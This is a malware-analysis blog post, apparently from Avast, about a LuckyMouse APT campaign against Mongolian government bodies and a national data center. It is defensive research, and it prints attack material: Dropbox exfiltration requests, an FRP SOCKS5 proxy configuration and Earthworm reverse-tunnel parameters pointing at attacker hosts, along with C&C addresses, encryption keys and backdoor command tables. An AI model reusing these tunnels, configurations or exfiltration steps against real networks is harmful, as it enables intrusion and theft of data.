Introduction
This summer, Avast discovered a new APT campaign targeting government agencies and a National Data Center of Mongolia. We consider with moderate confidence based on our research that the chinese-speaking APT group LuckyMouse is behind the attack.
The APT group planted backdoors and keyloggers to gain long-term access to government networks and then uploaded a variety of tools that they used to perform additional activities on the compromised network such as scanning of the local network and dumping credentials. We presume that the main aim of cyber-espionage was the exfiltration of sensitive data from potentially interesting government agencies.
According to our local telemetries, we consider that the government institutions were attacked in two ways. One was through a vulnerable company who is providing services for these agencies, and the other was through an email spear-phishing with a malicious attachment – a weaponized document using CVE-2017-11882.
There are many tactics that are consistent with other reports of LuckyMouse; nevertheless, we are also seeing some previously undocumented tactics indicating that the actors have updated their toolset with Polpo and LuckyBack backdoors. Our analysis below will highlight those new tactics.
Attribution & Clusterization
We base our presumption that this campaign was led by the LuckyMouse APT group on the tooling that we found during the investigation of this campaign, most of them having previously been attributed to LuckyMouse by other researchers[1][2][3].
In 2018, Kaspersky Labs released two blog posts about LuckyMouse targeting a national data center containing Asian government resources. Their blog posts described several tool sets such as network filtering driver NDISProxy, weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors), and Earthworm tunneler. They also described a DLL sideloading technique abusing legitimate applications from Symantec (IntgStat.exe). This is a legitimate application that loads a DLL pcalocalresloader.dll. By sideloading their own version pcalocalresloader.dll, they load HyperBro RAT from a compressed and encrypted file thumbs.db. While some of the tools that were used were publicly known tools that are available on the internet, the group also developed their own tools, including a rootkit[1][2].
In April 2019, PaloAlto Networks released a blogpost about LuckyMouse. According to the post, the group installed webshells on a SharePoint server to compromise Government Organizations in the Middle East. Similarly, the group used several publicly known and available tools (such as mimikatz, curl, ntbscan). But what got our attention was the fact that the same HyperBro RAT was used in the campaign we were analyzing. The APT attack we analyzed also used a DLL sideloading technique, although with different executables. The executable used was a Symantec application thinprobe.exe that loads thinhostprobedll.dll. This DLL was then used to sideload thumb.db that contained encrypted and compressed HyperBro[3].
We’ve also discovered a Polpo backdoor in the network belonging to the National Data Center of Mongolia. This backdoor was accompanied by samples that are known to be used by the LuckyMouse group which lead us to the conclusion that this backdoor is a new addition into LuckyMouse’s toolkit. We also observed more common tools, e.g. VMProtect-obfuscated Earthworm tunneler, a custom installer dropping NDISProxy network filtering driver, and various network scanners.
Infection Chain
We observed that this APT group was also targeting an unknown company that was providing services to government institutions in East Asia. The group infiltrated the company’s computers and managed to harvest credentials belonging to the company’s email accounts. Unfortunately, we haven’t been able to identify which attack vector was used in this infiltration. These credentials were then used to send emails from the hacked company’s email accounts to the government officials. While we were unable to recover the whole email, we’ve managed to recover the email’s header. The header indicates that these emails were asking the recipient to update a firmware, i.e. launch a self-extracting 7-zip archive attached to this email.
Date: Sun, 28 Jun 2020 20:43:08 +0800 (ULAT)
Subject: Re: Perform a firmware update on the server
XXXXXX_update.exe
(sha256:2D2EA3002C367684F21AD08BDC9B5079EBDEE08B6356AC5694EFA139D4C6E60D)
This archive drops three already familiar files – Symantec’s thinprobe.exe, malicious thinhostprobedll.dll, and thumb.db. The malicious DLL is used for DLL sideloading, decrypting and decompressing thumb.db and finally loading its processed content – a HyperBro RAT . This backdoor has also been reported on by Kaspersky[1] and PaloAlto Networks[3], the latter providing an extensive description of the HyperBro RAT.
Toolset
In this following section we describe a tool set we found on the victim’s PC, used by the APT group for cyber-espionage and lateral movement through the network. We could divide these tools into three categories:
- Helpers: ServiceInstaller, ShellCodeExecutor, DataExtractor 1/2, Information Collector
- Remote access: StartServiceTool, Korplug, LuckyBack, BlueTraveller, Polpo
- Publicly available tools: UAC bypass tool, port scanners, password dumpers, FRP, Earthworm tunneler
In detail, we found the following tools:
StartServiceTool
This tool installs wcm.dll into %WINDIR%\system32, a registry record
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WindowsConnections Manager
is created with the following values:
Description: Makes automatic connect/disconnect decisions based on the network connectivity options currently available to the PC and enables management of network connectivity based on Group Policy settings.
DisplayName: Windows Connections Manager
ServiceDll: C:\Windows\system32\wcm.dll.
This effectively creates a new service. The dropped binary is a 32-bit service DLL that has two parts – embedded DLL, and mmLoader (http://tishion.github.io/mmLoader/), a loader that bypasses the windows loader.
The final payload DLL is written in GO and contains a single export named “Interface“. This function expects 4 arguments consisting of two strings and their corresponding lengths. The string values specify the victim ID and the Dropbox API key to use. The API key is passed in as an RC4 encrypted + base64 encoded value.
The hardcoded decryption key is “0000111122223333“. The DLL additionally contains a default API key which appears to be for the authors test account.
Initially, it tries do download a file from Dropbox via the HTTP API:
POST /2/files/download HTTP/1.1
Host: content.dropboxapi.com
User-Agent: Go-http-client/1.1
Content-Length: 0
Authorization: Bearer [snipped]
Dropbox-Api-Arg: {“path”: “/infos/000000.txt”}
Accept-Encoding: gzip
If the server responds with a file, it tries to upload a file with a timestamp and a hostname onto Dropbox:
POST /2/files/upload HTTP/1.1
Host: content.dropboxapi.com
User-Agent: Go-http-client/1.1
Content-Length: 36
Authorization: Bearer [snipped]
Content-Type: application/octet-stream
Dropbox-Api-Arg: {“path”: “/infos/116a0d.txt”,”mode”: “overwrite”,”autorename”: true,”mute”: false,”strict_conflict”: false}
Accept-Encoding: gzip
%currentDate% %currentTime%##%hostname%
Afterwards, a C&C request-response loop is started. Based on the response from the C&C server, one of the following commands is executed: download files, upload files, sleep, quit, or execute commands on a command line. See the following diagram for a detailed flow, keep in mind that all download/upload are using the aforementioned Dropbox API:
ServiceInstaller
We assume that this installer is intended to be executed by one of the aforementioned backdoors as it requires command-line parameters for its successful execution:
| Switch | Argument |
| -i | path of DLL to install as a service |
| -u | Uninstall a specific service name |
At first, security descriptors of both %windir%\system32\ and %windir%\system32\drivers\ changes to allow the current user to copy files to these locations. Then the installer copies a service executable to %windir%\system32\ under a randomly generated name (4 alphanumeric characters).
Depending on whether a service named DFS Replication already exists in
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost netsvcs,
a new service called DFS Replication (if it does not exist) or IAS Jet Database Access Service %number% is created. More specifically, its parameters are:
Description: “Configures Internet Authentication Service (IAS). If this service is stopped, the remote network access that requires user authentication will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start or (Retail) Replicates files among multiple PCs keeping them in sync. On Client, it is used to roam folders between PCs; on the server, it is used to provide high availability and local access across a wide area network (WAN). If the service is stopped, file replication does not occur, and the files on the server become out-of-date. If the service is disabled, any services that explicitly depend on it will not start.”
DisplayName: DFS Replication/IAS Jet Database Access Service %number%
ServiceDll: C:\Windows\system32\<4 random alphanumeric characters>.dll.
Tag: 0
Security: 0
ShellCodeExecutor
This utility takes hex-encoded shellcode as an argument and then proceeds to execute it. The code responsible for decoding and unpacking can be seen below:
While we weren’t able to reconstruct which stage this executor was used, we were able to recover its parameter that corresponds to a hex-encoded metasploit-generated shellcode (reverse HTTP proxy – Github configured to connect to URL oss.chrome-upgrade[.]com (202.59.9[.]58). We suspect that the threat actors used the shellcode just to retrieve and execute a further stage from the C&C server.
DataExtractor 1
This tool can be used to gather potentially sensitive documents with pdf, ppt, xls, and doc file extensions. It recursively scans all connected drives for such documents that were modified in 2020 and later. Gathered documents are packed using Winrar and the archive is protected with a password “zaq1xsw@cde3”. This archive will be then saved to C:\MSBuild\NVIDIA\ under a filename CRYPTO-%computerName%-%number_value%.SYS. This scan is repeated every 20 minutes. If this tool is launched a second time (e.g. after reboot), only documents that were modified in the last 24 hours are gathered.
After each run, a file %windir%\system32\igfxme.vbs is executed. Since this tool did not contain any exfiltration-related functionality, we presume that this script is used to exfiltrate the archive from the computer to a C&C. Unfortunately, we were not able to recover this script.
DataExtractor 2
This binary is a simple filescanner that is provided with a list of file extensions, a list of directories, and date boundaries as parameters. Every directory from the list is searched for files with a given file extension. If such files are found and their modification date is within the provided date boundaries (in UTC), their full paths are written down into the output file. These paths are delimited by Windows line delimiters and they are encoded in 16-bit Unicode.
Below you will see a part of an error message, providing us the information about how this utility is used:
T040ClientLite.exe suffix .txt,.xls scanDirs E:\\test,E:\\test1 output E:\\test\\output.txt startEditDate 2020/04/26 endEditDate 2020/04/27
More generally, the command’s format is:
T040ClientLite.exe suffix <file extensions> scanDirs <directories> output <output file> startEditDate <date> endEditDate <date>
Information Collector
The Information Collector focuses on removable drives. If no such drives are connected, its execution is terminated. The collector fingerprints those drives (serial number, vendor ID, product ID), encrypts this data with a 64 byte XOR key, and stores it onto the system drive as hidden files. More specifically, it uses the following directories:
C:\MSBuild\Resources\Format\S-1-1 (encrypted files)
C:\MSBuild\Resources\Format\S-1-0\S-1-0-0 (unencrypted temporary files, deleted after encryption)
It ensures its persistence by adding itself into Run (SOFTWARE\Microsoft\Windows\CurrentVersion\Run) registry key under AvpSecurity.
Interestingly, it contains many unused functions using command-line tools such as: systeminfo, arp, ipconfig, netstat, and tasklist. It also supports archiving the collected information using WinRAR with a hard-coded password “1qaz@WSX”. The sample has no networking capabilities. It primarily serves for collecting the information and transferring the gathered information using removable drives between the machines in the network.
Moreover, the particular sample we analyzed contained a bug in the drives’ enumeration routine that made it virtually useless as it hampered all the sample’s functionality.
RAT
Korplug (PlugX)
Korplug (PlugX) is a well-known Remote Access Trojan associated with Chinese speaking attackers and it has been used in a large number of targeted attacks since 2012[4]. It uses DLL side-loading to load itself into the memory through legitimate applications. It helps it stay unnoticed by any security product. Korplug is a fully featured RAT, with capabilities such as file uploads, downloads, keystroke logging, webcam control and access to a remote cmd.exe shell.
In our case, we observed that it was loaded through an application provided by ESET called unsecapp.exe that was signed with a valid, but expired certification. After executing unsecapp.exe, it loads a malicious DLL http_dll.dll. This DLL, in turn, decrypts http_dll.dat with a custom algorithm, yielding Korplug which is then loaded into the memory and executed. Unfortunately, we were not able to trace the RAT back to the original payload that dropped and executed these files.
Address of C&C servers:
web[.]microlynconline[.]com:80
home[.]microlynconline[.]com:8000
help[.]microlynconline[.]com:443
host[.]microlynconline[.]com:53
Backdoors
We found three different backdoors in the government office network, two of which, PolPo and LuckyBack, were never seen in any previous campaign. Polpo also hits the National Data Center, and the two others, BlueTraveller and LuckyBack, only hit the government office network.
LuckyBack
LuckyBack collects the computer’s fingerprint, at first, and then tries to establish a communication with the C&C server (45.77.55[.]145). Once the communication is established, the backdoor starts listening for commands. It is capable of: starting a remote shell, file manipulation (move, read, write, execute, get file size), keylogging, and screen capturing.
Technical:
At first, the used code page is retrieved by calling chcp, a command providing the keyboard and character set information, on the system drive.
The first request on the C&C server “registers” the device by providing its fingerprint. Namely, the fingerprint is constructed from: PID, Windows version/build number, CPU architecture, username, user privileges, hostname, IP address, code page, and RDP session ID.
If the server accepts the registration, it responds with the PID and a simple string “OK”. Afterwards, a simple request-response C&C loop is started, and commands and their corresponding numbers are displayed in the table below:
| Commands | Functions |
| 0x70, 0x72 | Receive data again |
| 0x1, 0x11 | Creates remote shell or quit remote shell |
| 0x2 | File size and last write from spec. file |
| 0x3 | It’s reads data from specific offset and file |
| 0x4 | Gets file size |
| 0x12 | Delete spec. file |
| 0x13 | Terminate specific thread |
| 0x14 | Receiving reading configuration |
| 0x22 | Execute %command% via CreateProcess API |
| 0x23 | Set a reading configuration for 0x3 command |
| 0x24 | Writes data to specific file |
| 0x32 | File operations (move file from one location to another) |
| 0x50 | Start keylogging |
| 0x51 | Stop keylogging |
| 0x60 | Take screenshot |
BlueTraveller
This backdoor is simpler in terms of commands than the previous one. It accepts just four commands: exit, upload, download, and execute on the command line. Nevertheless, it uses two layers of C&C servers, meaning that the first request is on the first layer, and it yields an IP address of a C&C server from the second layer. Afterwards, the request-response C&C loop uses the second layer. If the backdoor receives a command for the command line, the output from the console is encrypted with AES-256 and sent back to the second-layer C&C server.
The binary itself has its strings encrypted with RC4, using a hardcoded key “L!Q@W#E$R%T^Y&U*A|}t~k”. Among these strings, we may find the address of the first-layer C&C server and the user agent that should be used for these requests. Our sample tried to contact http://go.vegispaceshop[.]org/shop.htm. The response seems to be pretty inconspicuous at first glance. But once we have a look more closely, we see that many lines are followed by a mixture of tabs and spaces,which is rather fishy indeed. And surprisingly this is where the IP address of the second C&C layer hides!
The BlueTraveller uses the same scheme for encryption – AES-256 with a key derived from a string that is hashed with SHA-256, providing the IV and the key. The first usage of this encryption is in the first request to the second-layer C&C. For this first request, the key is derived from a string “0304276cf4f31345“. The key is then used to encrypt the generated GUID and the computer’s hostname which are then Base64-encoded and used to generate the request URL:
http://<second_layer_C&C>/home/<rand number>/<enc_length>/<Base64 data>.
After this request is executed, commands are retrieved from:
http://<second_layer_C&C>/index.htm.
The obtained data is encrypted with AES-256, using the aforementioned approach with GUID as a base-string for the key-derivation procedure. Each response also contains the random number that was sent in the first second-layer request. The malware checks whether the received number matches the one it sent; in case of a mismatch, the command is discarded. If a command for the command line is received, the output of the executed command (AES-256 encrypted, using the same key as the previous response, and Base64 encoded) is sent to
http://<second_layer_C&C>/help/<rand number>/<enc_length>/<Base64 data>.
Polpo
Polpo is a backdoor that we’ve been seeing in the wild since 2018. It supports around 15 different commands including information collection and exfiltration, file transfer, and proxy connections.
| Base64 | IP |
| MjAzLjkxLjExOS40OjgwMDA= | 203.91.119[.]4:8000 |
| MjAyLjE3OS4wLjE0Mjo4MDgw | 202.179.0[.]142:8080 |
| MjAyLjE3OS41LjE2MTo0NDM= | 202.179.5[.]161:443 |
Base64-encoded addresses of C&C servers are hard-coded in the binary
Polpo – Communication
The backdoor mimics the HTTP protocol to blend with the normal traffic. The transferred data is encrypted with AES and encoded into Base64 then sent as a part of fake HTML content.
The AES encryption key is derived from the first packet of each new command received from the C&C server, using the algorithm below:
The sample checks for a proxy configured on the system found in the Registry Key Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable. If a proxy is configured it uses the server specified in Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer for all the connections.
Polpo – Functionality
There are more than 15 commands supported by the backdoor, although some of them are duplicates. Most of the commands are executed in separate threads. Errors and inter-thread communication are handled using Events.
These commands are supported by the version of Polpo we’ve analyzed:
| Main commands | Sub commands | Functions |
| 0x1FFFFFF | Initialize CLI Interface | |
| 0x101FFFF | CLI Spawn CMD.EXE | |
| 0x102FFFF | CLI Write Data To File | |
| 0x103FFFF | CLI List Directory | |
| 0x104FFFF | CLI ShellExecuteW(0, “Open”, Cmd, 0, 0) | |
| 0x106FFFF | CLI Change Directory | |
| 0x107FFFF | CLI Delete File | |
| 0x2EEEEEE | Commands | |
| 0x201EEEE | Enumerate Drives Info | |
| 0x202EEEE | Enumerate Files | |
| 0x203EEEE | Send File To C&C | |
| 0x204EEEE | Write Data To File | |
| 0x 205EEEE | Run Default App | |
| 0x206EEEE | Shell Execute Open | |
| 0x207EEEE | Delete File | |
| 0x208EEEE | Delete Files Recursive | |
| 0x3DD03DD | Serve As Proxy (Hide As Http) | |
| 0x30103DD | Get Data To Transfer | |
| 0x3DDDDDD | Serve As Proxy (Raw Data) | |
| 0x5FFFFFF | Close Connection | |
| 0x60AAAAAA | Close Connection | |
| 0x70BBBBBB | Reboot | |
| 0x80CCCCCC | Shutdown System | |
| 0xAFFFFFF | Send File To C&C |
UAC bypass tool
An open-source UAC bypass tool (https://github.com/vestjoe/WinPwnage) was detected on several compromised devices. It may be used to elevate privileges or achieve persistence on the system. We presume that it was used to execute tasks and programs under administrator-level permissions.
Port-scanners
Several different port scanners were seen on compromised devices under various filenames. One of the used port scanners was open-source https://github.com/kingron/s. We assume that in this case it was used for scanning the ports of the server to find out which services were running.
Nbtscan
Nbtscan is a command-line NetBIOS scanner for Windows that scans for open NetBIOS name servers in the network.
Passwords dumpers
Mimikatz and Lazagne were seen on the infected computers. We presume that they were used to retrieve credentials from the compromised computers. We’ve also spotted a wrapped Mimikatz version, download from https://github.com/jas502n/mimikat_ssp, on several compromised devices.
FRP
Fast Reverse Proxy (FRP) is a tool that allows you to expose local services that are hidden behind the NAT or a firewall to the internet. Both the raw TCP and UDP are supported as well as several other protocols whose requests can be forwarded to the internal services via this proxy. We’ve recovered a configuration file 3bef4cd.tmp for this proxy. The content of this proxy is the following:
[common]
server_addr = 202.59.9[.]58
server_port = 8443
privilege_token = %token%
[SDJY_proxy]
type = tcp
remote_port = 6001
plugin = socks5
It is immediately obvious that the actor used the SOCKS5 plugin to route requests to the compromised network via 202.59.9[.]58:8443.
Earthworm tunneler
The Earthworm tunneler is considered to be a typical tool for Chinese-speaking actors by Kaspersky[1]. We’ve seen this tool on all compromised systems of national data center. On one of these devices, we’ve managed to recover command-line parameters that were used: -s rssocks -d 139.180.155.133 -e 80. The tool itself creates a SOCKS tunnel to the provided server. It is publically available at http://rootkiter.com/EarthWorm/.
Conclusions
As this blogpost demonstrates, LuckyMouse has used new methods to infiltrate the government institution through a third party’s system which they attacked.
Avast has recently protected users in the government institution and national data center from further attacks using the samples we analyzed. We also discovered an interesting encryption method that delivers a hidden IP address in the whitespace of the C&C response. We presume that the attackers updated their attacking toolset in this campaign after it was discovered by Avast.
I would like to thank Adolf Středa, David Zimmer and Anh Ho for helping me with this research.
Indicators of Compromise (IoC)
- Repository: https://github.com/avast/ioc/tree/master/
- List of SHA-256: https://github.com/avast/ioc/blob/master/
MITRE ATT&CK techniques
|
Tactic |
ID |
Name |
Comment |
|
Initial Access |
T1199 |
Trusted Relationship |
Sending emails from hacked trusted email accounts |
|
T1566.001 |
Spear Phishing Attachment |
Emails with malicious documents and software updates |
|
|
Execution |
T1059.003 |
Windows Command Shell |
|
|
T1204.002 |
Malicious File |
||
|
T1203 |
Exploitation for Client Execution |
Documents weaponized with CVE-2017-11882 – Equation Editor |
|
|
T1106 |
Native API |
Windows API CreateProcessW |
|
|
Persistence |
T1547.001 |
Registry Run Keys |
Using “SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AvpSecurity” |
|
T1543.003 |
Create or Modify System Process: Windows Service |
Multiple samples create services for persistence |
|
|
Privilege Escalation |
T1548.002 |
Bypass User Access Control |
WinPwnage tool |
|
T1543.003 |
Create or Modify System Process: Windows Service |
Installs services in: “HKLM\SYSTEM\CurrentControlSet\Services\” |
|
|
Defense Evasion |
T1574.002 |
Hijack Execution Flow: DLL Side-Loading |
HyperBro was loaded,decrypted, decompressed and executed by a legitimate application using this technique. |
|
T1564.001 |
Hidden Files and Directories |
Hiding collected information in hidden directories and files |
|
|
T1027 |
Obfuscated Files or Information |
Collected information is encrypted using byte XOR operation |
|
|
T1218.011 |
Rundll32 |
Executing shell code |
|
|
T1218 |
Signed Binary Proxy Execution |
thinprobe.exe (Symantec), unsecapp.exe (ESET) |
|
|
Credential Access |
T1003.001 |
LSASS Memory |
Mimikatz |
|
T1552 |
Unsecured Credentials |
Lasagne |
|
|
Discovery |
T1083 |
File and Directory Discovery |
Search for sensitive documents with extensions pdf, ppt, xls, doc |
|
T1046 |
Network Service Scanning |
used publicly available tools “nbtscan” and port scanner “s” |
|
|
T1120 |
Peripheral Device Discovery |
Searching for removable drives on the system |
|
|
T1082 |
System Information Discovery |
||
|
Lateral Movement |
T1091 |
Replication Through Removable Media |
Information Collector is capable of copying binary files to removable drives |
|
Collection |
T1560.001 |
Archive Collected Data: Archive via Utility |
hides exfiltrated documents in password-protected .rar archives. |
|
T1119 |
Automated Collection |
||
|
T1056.001 |
Input Capture: Keylogging |
Used in LuckyBack backdoor |
|
|
Command and Control |
T1071.001 |
Application Layer Protocol: Web Protocols |
Polpo: HTTP is used for communications with C2 |
|
T1132.001 |
Data Encoding: Standard Encoding |
Polpo: Encrypted data is encoded as Base64 |
|
|
T1573.001 |
Encrypted Channel: Symmetric Cryptography |
Polpo: Transfered data is encrypted with AES |
|
|
T1104 |
Multi-Stage Channels |
BlueTraveller: multiple C&C servers are used |
|
|
T1090.001 |
Proxy: Internal Proxy |
Polpo: serves as proxy in the network |
|
|
Exfiltration |
T1052.001 |
Exfiltration Over Physical Medium: Exfiltration over USB |
Information Collector moves files in the network over removable drives |
|
T1567.002 |
Exfiltration Over Web Service: Exfiltration to Cloud Storage |
StartServiceTool: Dropbox is used for exfiltration of collected data |
|
|
T1041 |
Exfiltration Over C2 Channel |
Polpo exfiltrated data to C&C server |
References
[1] https://securelist.com/luckymouse-hits-national-data-center/86083/
[2] https://securelist.com/luckymouse-ndisproxy-driver/87914/
[4] https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/
